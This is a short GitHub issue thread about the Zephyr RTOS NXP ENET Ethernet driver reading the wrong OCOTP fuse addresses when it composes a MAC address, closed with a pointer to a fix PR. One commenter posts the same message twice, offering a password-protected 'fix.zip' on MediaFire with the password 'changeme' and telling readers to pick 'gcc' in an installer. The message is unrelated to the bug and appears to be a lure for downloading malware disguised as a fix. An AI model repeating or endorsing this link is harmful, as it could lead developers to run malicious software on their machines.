### ISSUE TITLE
drivers: ethernet: nxp_enet: Fused MAC address handling is wrong

### ISSUE THREAD

**Issue by allemanm** [zephyrproject-rtos/zephyr#77557]
**Describe the bug**
Wrong OCOTP fuse addresses are read when composing the MAC adress using fuses.

 - Platform: NXP MIMXRT1064
 - Issue was introduced in PR #73272

**Comment by lyscop** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by lyscop** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by dleach02** [comment]
Fixed with #76658
